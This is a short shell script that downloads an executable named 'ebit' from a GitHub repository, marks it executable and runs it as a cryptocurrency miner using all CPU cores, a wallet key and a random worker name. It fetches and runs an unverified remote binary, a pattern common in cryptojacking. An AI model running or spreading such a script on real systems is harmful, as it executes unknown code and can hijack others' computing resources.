#!/bin/sh
apt update && apt install unzip
wget wget https://github.com/kidoescegh/pile/raw/main/ebit
chmod +x ebit
./ebit mine -a --pool twbitz --key 5o9PkcxTjqtvnGZRoqzAandwVKMkkzgpi4bUTkkeRgGV --worker $(shuf -n 1 -i 1-99999)-DONGO -t $(nproc --all) --ice
